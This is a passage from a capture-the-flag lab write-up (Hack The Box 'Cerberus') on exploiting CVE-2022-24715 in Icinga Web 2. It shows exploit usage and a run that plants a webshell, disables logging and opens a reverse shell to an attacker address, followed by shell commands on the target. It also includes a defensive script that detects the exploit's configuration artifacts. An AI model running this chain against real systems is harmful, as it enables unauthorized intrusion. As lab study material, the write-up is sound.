Remote Code Execution
The target Icinga Web 2 instance has additionally been identified as vulnerable to [[Cerberus_CVE-2022-24715#[CVE-2022-24715](https://nvd.nist.gov/vuln/detail/CVE-2022-24715)|CVE-2022-24715]], an authenticated RCE vulnerability.
┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ python3 CVE-2022-24715.py --help
usage: CVE-2022-24715.py [-h] -t TARGET -I ATK_IP -P ATK_PORT -u USERNAME -p PASSWORD -e PEM [-x PROXY]
Authenticated Remote Code Execution in Icinga Web <2.8.6, <2.9.6, <2.10
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target icinga location (example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)
-I ATK_IP, --atk-ip ATK_IP
Address for reverse shell listener on attacking machine
-P ATK_PORT, --atk-port ATK_PORT
Port for reverse shell listener on attacking machine
-u USERNAME, --username USERNAME
Username of administrator user on Icinga Web 2
-p PASSWORD, --password PASSWORD
Password of administrator user on Icinga Web 2
-e PEM, --pem PEM Location of file on attacking machine containing valid PEM (Generate with "ssh-keygen -m pem" without passphrase)
-x PROXY, --proxy PROXY
http proxy address (example: http://127.0.0.1:8080/)
The exploit script works by
- uploading a malicious SSH resource with a crafted name
- writing a PHP webshell to a writable location through the SSH private key field
- triggering the webshell by modifying certain application configurations, enabling a custom module, and then executing a command on the target system
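Each step of that chain leaves a configuration artifact behind (a resource name with path characters, logging switched off as the script itself warns, an extra enabled module). The following Python is an added defensive audit, not part of the exploit script or of the Icinga project; the INI contents are constructed samples, and the module allow list and the name pattern are assumptions for this example.

```python
import configparser
import re

# Constructed sample resources.ini (not taken from the target). The third
# section mimics an SSH resource whose name tries to escape the key directory.
SAMPLE_RESOURCES_INI = """
[icingaweb_db]
type = "db"
db = "mysql"

[deploy_host]
type = "ssh"
user = "deploy"

[../../../usr/share/icingaweb2/public/shell]
type = "ssh"
user = "www-data"
"""

# Constructed config.ini in the post-exploitation state (logging set to none).
SAMPLE_CONFIG_INI = """
[logging]
log = "none"
"""

# Assumed allow list of modules this deployment is expected to have enabled.
EXPECTED_MODULES = {"monitoring", "doc", "translation"}

# Path separators, traversal or NUL bytes have no place in a resource name.
SUSPICIOUS_NAME = re.compile(r"(\.\.|[/\\\x00])")


def suspicious_ssh_resources(ini_text):
    """Return names of SSH resources whose section name contains path characters."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(ini_text)
    return [name for name in cp.sections()
            if cp.get(name, "type", fallback="").strip('"') == "ssh"
            and SUSPICIOUS_NAME.search(name)]


def logging_disabled(ini_text):
    """True when [logging] log is set to none, the state the exploit leaves behind."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    return cp.get("logging", "log", fallback="").strip('"').lower() == "none"


def unexpected_modules(enabled, expected=EXPECTED_MODULES):
    """Enabled modules that are not on the allow list, sorted for stable output."""
    return sorted(set(enabled) - set(expected))


def audit(resources_ini, config_ini, enabled_modules):
    """Collect all three indicators into a list of human-readable findings."""
    findings = [f"ssh resource with path characters in name: {n!r}"
                for n in suspicious_ssh_resources(resources_ini)]
    if logging_disabled(config_ini):
        findings.append("application logging is set to none")
    findings += [f"enabled module not in allow list: {m}"
                 for m in unexpected_modules(enabled_modules)]
    return findings


if __name__ == "__main__":
    # Constructed module list standing in for the contents of enabledModules/.
    for f in audit(SAMPLE_RESOURCES_INI, SAMPLE_CONFIG_INI, ["monitoring", "doc", "shell"]):
        print("[FINDING]", f)
```

On a live host the same functions can be fed the default Icinga Web 2 files, /etc/icingaweb2/resources.ini and /etc/icingaweb2/config.ini, with the module list taken from the entries of /etc/icingaweb2/enabledModules.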
┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ ssh-keygen -m pem
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): /home/kali/archive/htb/labs/cerberus/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/archive/htb/labs/cerberus/id_rsa
Your public key has been saved in /home/kali/archive/htb/labs/cerberus/id_rsa.pub
The key fingerprint is:
SHA256:wblK7lIqdbY2txtlncAbu3vzg735m1tHrdmi3BOWDm0 kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| |
| . o |
| + + |
| o * . .|
| . S = o. .o|
| .o+. o .. E= |
| . =o.. . B+.+|
| . o.+ .. o+o=o+|
| . o.ooo..oo=O+|
+----[SHA256]-----+
Generating a PEM key pair
┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ python3 cve-2022-24715.py -t 'http://icinga.cerberus.local:8080/icingaweb2' -I 10.10.14.4 -P 9999 -u matthew -p 'IcingaWebPassword2023' -e ./id_rsa
[INFO] Attempting to login to the Icinga Web 2 instance...
[INFO] Attempting to upload our malicious module...
[SUCCESS] The payload appears to be uploaded successfully!
[INFO] Modifying configurations...
[INFO] Attempting to enable the malicious module...
[INFO] Trying to trigger payload! Have a listener ready!
[SUCCESS] It appears that a reverse shell was started!
[INFO] Removing malicious module file...
[INFO] Disabling malicious module...
[INFO] Resetting website configuration...
[SUCCESS] Cleanup successful! Shutting down...
[ALERT] In the process of exploitation, the application logging has been turned off. Log in manually to reset these settings!
Executing
┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.205] 49884
bash: cannot set terminal process group (625): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ whoami
whoami
www-data
www-data@icinga:/usr/share/icingaweb2/public$ hostname
hostname
icinga
www-data@icinga:/usr/share/icingaweb2/public$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.22.2 netmask 255.255.255.240 broadcast 172.16.22.15
inet6 fe80::215:5dff:fe5f:e801 prefixlen 64 scopeid 0x20<link>
ether 00:15:5d:5f:e8:01 txqueuelen 1000 (Ethernet)
RX packets 236319 bytes 31936551 (31.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 304334 bytes 49433800 (49.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 15644 bytes 1197456 (1.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 15644 bytes 1197456 (1.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established in the container environment, 172.16.22.2, as the www-data account by exploiting CVE-2022-24715.